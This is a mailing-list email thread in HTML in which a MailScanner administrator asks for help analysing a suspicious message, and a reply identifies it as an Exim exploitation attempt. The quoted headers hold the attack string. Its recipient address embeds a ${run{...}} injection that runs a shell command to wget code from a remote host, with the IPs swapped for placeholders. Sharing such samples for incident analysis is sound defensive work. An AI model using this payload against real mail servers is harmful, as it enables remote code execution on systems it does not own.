<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  </head>
  <body text="#000000" bgcolor="#FFFFFF">
    thanks for answering...<br>
    <br>
    at now, i've got a main-question: As it seems, they tried to
    download and execute some code, so i need to make shure if they did
    succeed, cause if so, i need to shutdown MailScanner imidiately.<br>
    But as you stated this should only work with exim ... <br>
    The next question is: Where did the <b>Received:1-31</b> lines come
    from? They're looking a bit strange to me.<br>
    <span class="tlid-translation translation" lang="en"><span title=""
        class=""><br>
      </span></span>
    <pre class="moz-signature" cols="72">Mit freundlichen Gruessen

H. Backhaus 

Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: <a class="moz-txt-link-abbreviated" href="mailto:heino.backhaus@fink-computer.de">heino.backhaus@fink-computer.de</a>
Web: <a class="moz-txt-link-abbreviated" href="http://www.fink-computer.de">www.fink-computer.de</a>
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink

I was gratified to be able to answer promptly, and I did.
I said I didn't know.
 Mark Twain
</pre>
    <div class="moz-cite-prefix">Am 15.07.2019 um 13:13 schrieb Martin
      Hepworth:<br>
    </div>
    <blockquote type="cite"
cite="mid:CAGDKor+W0NHTWOOBJoFW1kTfmdB4vJ31SdnuEsAPYxe8Vim-XQ@mail.gmail.com">
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <div>
        <div dir="auto">Looks like an attempt at the Exim vulnerability
          exploitation rather than mailscanner</div>
      </div>
      <div><br>
        <div class="gmail_quote">
          <div dir="ltr" class="gmail_attr">On Mon, 15 Jul 2019 at
            11:59, Heino Backhaus <<a
              href="mailto:heino.backhaus@fink-computer.de"
              moz-do-not-send="true">heino.backhaus@fink-computer.de</a>>
            wrote:<br>
          </div>
          <blockquote class="gmail_quote" style="margin:0 0 0
            .8ex;border-left:1px #ccc solid;padding-left:1ex">
            <div text="#000000" bgcolor="#FFFFFF"> Hallo List,<br>
              <br>
              i need some help analysing the following email, i received
              last week.<br>
              <br>
              Mailwatch Mail-Metadata:<br>
              <br>
              Received: from <a href="http://sab.com" target="_blank"
                moz-do-not-send="true">sab.com</a> (unknown
              [46.22.132.94])<br>
                   by mailscanner.mydomain.local (Postfix) with SMTP id
              D3F551005AD<br>
                   for <root+${run{x2fbinx2fsht-ctx22wgetx20<b>1.2.3.4</b>x2fsbzx2f<b>5.6.7.8</b><a
                class="m_-5282560356877763242moz-txt-link-abbreviated"
                href="mailto:x22%7D%7D@mailscanner.mydomain.local"
                target="_blank" moz-do-not-send="true">x22}}@mailscanner.mydomain.local</a>>;
              Thu, 11 Jul 2019 19:34:58 +0200 (CEST)<br>
              <b>Received: 1</b><b><br>
              </b><b> Received: 2</b><b><br>
              </b><b> Received: 3</b><b><br>
              </b><b> Received: 4</b><b><br>
              </b><b> Received: 5</b><b><br>
              </b><b> Received: 6</b><b><br>
              </b><b> Received: 7</b><b><br>
              </b><b> Received: 8</b><b><br>
              </b><b> Received: 9</b><b><br>
              </b><b> Received: 10</b><b><br>
              </b><b> Received: 11</b><b><br>
              </b><b> Received: 12</b><b><br>
              </b><b> Received: 13</b><b><br>
              </b><b> Received: 14</b><b><br>
              </b><b> Received: 15</b><b><br>
              </b><b> Received: 16</b><b><br>
              </b><b> Received: 17</b><b><br>
              </b><b> Received: 18</b><b><br>
              </b><b> Received: 19</b><b><br>
              </b><b> Received: 20</b><b><br>
              </b><b> Received: 21</b><b><br>
              </b><b> Received: 22</b><b><br>
              </b><b> Received: 23</b><b><br>
              </b><b> Received: 24</b><b><br>
              </b><b> Received: 25</b><b><br>
              </b><b> Received: 26</b><b><br>
              </b><b> Received: 27</b><b><br>
              </b><b> Received: 28</b><b><br>
              </b><b> Received: 29</b><b><br>
              </b><b> Received: 30</b><b><br>
              </b><b> Received: 31</b><br>
              <br>
              <br>
              <br>
              IP1: <b>199.204.214.40</b> changed to <b>1.2.3.4</b> to
              disarm this...just in case...<br>
              IP2: <b>87.138.227.107</b> changed to <b>5.6.7.8</b> to
              disarm this...just in case...<br>
              <br>
              Versions:<br>
              MailWatch Version: 1.2.9<br>
              OS: Ubuntu 16.04.6 LTS (Xenial Xerus)<br>
              Postfix Version: 3.1.0 <br>
              MailScanner Version: 5.1.2<br>
              ClamAV Version: 0.102.0-devel-20190715 <br>
              SpamAssassin Version: 3.4.2 <br>
              PHP Version: 5.6.40-8+ubuntu16.04.1+<a
                href="http://deb.sury.org" target="_blank"
                moz-do-not-send="true">deb.sury.org</a>+1<br>
              MySQL Version: 5.7.26-0ubuntu0.16.04.1<br>
              <br>
              Can you help me to bring some light in this dark...<br>
              <pre class="m_-5282560356877763242moz-signature" cols="72">-- 
Mit freundlichen Gruessen

H. Backhaus 

Fink-Computer Systeme
<a href="https://www.google.com/maps/search/Heggrabenstr.+9,+35435+Wettenberg?entry=gmail&source=g" moz-do-not-send="true">Heggrabenstr. 9, 35435 Wettenberg</a>
Email: <a class="m_-5282560356877763242moz-txt-link-abbreviated" href="mailto:heino.backhaus@fink-computer.de" target="_blank" moz-do-not-send="true">heino.backhaus@fink-computer.de</a>
Web: <a class="m_-5282560356877763242moz-txt-link-abbreviated" href="http://www.fink-computer.de" target="_blank" moz-do-not-send="true">www.fink-computer.de</a>
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink

I was gratified to be able to answer promptly, and I did.
I said I didn't know.
 Mark Twain
</pre>
            </div>
            <div text="#000000" bgcolor="#FFFFFF"> <br>
              --
              <br>
              Diese E-Mail wurde auf Viren und gefährliche Anhänge
              <br>
              durch
              <a href="http://www.mailscanner.info/" target="_blank"
                moz-do-not-send="true"><b>MailScanner</b></a> untersucht
              und ist wahrscheinlich virenfrei.
            </div>
            <br>
            <br>
            -- <br>
            MailScanner mailing list<br>
            <a href="mailto:mailscanner@lists.mailscanner.info"
              target="_blank" moz-do-not-send="true">mailscanner@lists.mailscanner.info</a><br>
            <a
              href="http://lists.mailscanner.info/mailman/listinfo/mailscanner"
              rel="noreferrer" target="_blank" moz-do-not-send="true">http://lists.mailscanner.info/mailman/listinfo/mailscanner</a><br>
            <br>
          </blockquote>
        </div>
      </div>
      -- <br>
      <div dir="ltr" class="gmail_signature"
        data-smartmail="gmail_signature">-- <br>
        Martin Hepworth, CISSP<br>
        Oxford, UK</div>
      <br>
      --
      <br>
      Diese E-Mail wurde auf Viren und gefährliche Anhänge
      <br>
      durch
      <a href="http://www.mailscanner.info/" moz-do-not-send="true"><b>MailScanner</b></a>
      untersucht und ist wahrscheinlich virenfrei.
      <br>
      <fieldset class="mimeAttachmentHeader"></fieldset>
      <pre class="moz-quote-pre" wrap="">

</pre>
    </blockquote>
    <br>
  <br />--
<br />Diese E-Mail wurde auf Viren und gefährliche Anhänge
<br />durch
<a href="http://www.mailscanner.info/"><b>MailScanner</b></a> untersucht und ist wahrscheinlich virenfrei.
</body>
</html>